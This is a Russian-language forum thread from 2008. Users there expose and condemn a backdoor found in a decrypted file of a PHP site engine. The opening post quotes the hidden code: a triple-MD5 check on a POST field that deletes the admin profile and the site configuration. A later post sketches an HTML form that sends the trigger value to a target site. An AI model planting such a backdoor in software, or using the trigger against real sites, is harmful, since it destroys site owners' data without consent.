Падонагъ [Off] [#] (17.02.2008 / 19:19)

Камрады,в соседнем разделе всплыла инфа,в расшифрованном файле gzip.php ( спасибо камраду def) обнаружены такие строки:
if(md5(md5(md5($_POST['log'])))=="94beb4eddd1ca52274be3b95cb3c1b1b"){
unlink (BASEDIR."local/profil/$config_nikname.prof");
unlink (BASEDIR."local/config.dat");
unset($_POST['log'],$_POST['par']);
header ("Location: ".BASEDIR."index.php?".SID);
exit;

то есть по русски-
Если
{тройной мд5 хэш от значения элемента с ключом log ,переданного в массиве $_POST, равен 94beb4eddd1ca52274be3b95cb3c1b1b
}
удалить профиль админа этого сайта;
удалить файл с настройами сайта;
уничтожить элементы пост массива (хз наверно следы замести);
перенаправить на главную( полюбоваться на дело рук своих гГг);

так то ,девочки и мальчики

AlkatraZ (SV!) [Off] [#] (17.02.2008 / 19:28) Уездный предводитель Каманчей

Дааа, дожились. Ужос.
Но пихать бэкдоры - это реальня подлянка.

Падонагъ [Off] [#] (17.02.2008 / 19:36)

то есть представьте себе файл к примеру visavi.net/pizdec/index.php с примерно следующим содержымым:
<?php
echo "<form action='адрес_сайта/index.php' method='post'>
<input type='hidden' name='log' value='кое_что' />
<input type='submit' value='Убить сайт' /></form>";
?>

который сто пудов существует. Видимо он создан для того чтоб гробить сайты,на которых сняли бесплатно копирайт. Но!!! Вредоносный код содержыцца ф каждом сайте где установлен мотор 17 ! Каково владельцам этих сайтов будет узнать, что в любой момент откуда то извне могут уничтожыть их сайт,в который было вложено немало труда,и возможно средств?? При чом это сможет сделать не только Вантуз, а любой кто подберет необходимое значение этой переменной
Изм. Падонагъ (17.02.2008 / 19:37) [1]

Падонагъ [Off] [#] (17.02.2008 / 19:43)

вообщем, братва,думайте сами... Ваше дело ждать ли выход нового мотора и ставить ли его. Ну а Вантуз полностью потеряет доверие юзеров. Так вещи не делаются.На его месте я бы бросил писать,ушел бы из инета и спрятался чтоб меня не нашли...

МихалЫч [Off] [#] (17.02.2008 / 20:38)

Жек, палюбак прально мыслишь...

Rarih [Off] [#] (17.02.2008 / 20:45)

Ебать мой хуй...

Piks [Off] [#] (17.02.2008 / 21:14)

Мда, я не ожидал такого.. Пиздец =//
Но всеравно, у меня уже даверие к мотору отпало с выходом 16 версии, непонрвился мне он изначально. Мне уже пох что они с этим мотором сделают

matis4e [Off] [#] (17.02.2008 / 21:49)

жадность в реале убивает все человеческое. Но он бы один до этого не дошел бы, кто то подполкнул его на ето. Фу бля. В тихом омуте мрази живут.

Piks [Off] [#] (17.02.2008 / 21:51)

Дык слышал, что некий BWC эту систему шифрования придумал

StalKeR [Off] [#] (17.02.2008 / 22:07)

принцип шифровани походу был взят из дле(там тоже eval(base64_decode());

йогин [Off] [#] (17.02.2008 / 22:14)

а где можно скачать раскодированный 17 мотор?

Падонагъ [Off] [#] (17.02.2008 / 22:16)

а нахуй он тебе нужен? Тут ребята файлы расшифровали,у них спроси

МихалЫч [Off] [#] (17.02.2008 / 23:37)

Piks(17.02.2008/15:14):" ...Но всеравно, у меня уже даверие к мотору отпало с выходом 16 версии, непонрвился мне он изначально... "Если честно... мине также... только поставил и сразу удалил, зря трафик спалил только... самая удачная версия это 15.7 ИМХО

Борман [Off] [#] (18.02.2008 / 00:15)

гггг вот прикол! Маладец Вантуз што патстрахавался и трайным мд5 код этат защитил! иво практически ниразгадать типерь. мы далжны васхвалять иво типерь за такие прадуманные паступки! гггг интиресно при устанофке матора 17 скрипт нешлёт инфу а сцайте где он установлен и на автаматическую праверку капирайта? а то чо зря траф. палить... сиди сибе и удаляй сцайты! гггг нихарашо такаг! абалдеть....

NEMO [Off] [#] (18.02.2008 / 00:16)

Гг. Мля, уже второй день читаю и тихо охуеваю со всего происходящего. Но бэкдор это уже чересчур. Интересно, что в зашифрованных файлах еще припасено?

Monstr [Off] [#] (18.02.2008 / 00:35)

Джон, а шо ты мне сказал про бэкдоры когда я про чат мотора спрашивал? Мля вот это жестко санек резанул
Изм. Monstr (18.02.2008 / 00:35) [1]

Inferpse [Off] [#] (18.02.2008 / 00:51)

гг, а я от делать нефиг кейген сделал ))
ппц он конечно гонит: чтоб расшифровать файл, надо столько проходов и операций сделать, а учитывая то, что почти в каждой странице мотора инклудится несколько таких шифрованых файлов, то грузит это серв нехило.

Кстати вантуз не придумывал алгоритм шифрования - есть прога походу "TrueBug PHP Encoder" - вот она таким макаром шифрует, только gzip.php руками закодирован был. Бэкдор обидно - в ответ на это можно спокойно копирайты снимать :\

Den398 [Off] [#] (18.02.2008 / 01:23)

Добрый день всем кто меня знает и не знает,почитал и ахуел

NEMO [Off] [#] (18.02.2008 / 01:25)

Бугага. На Визави была тема про бэкдор(автора не успел посмотреть) Снесли нах.

Inferpse [Off] [#] (18.02.2008 / 01:26)

Она уже не первая такая тема на визави..)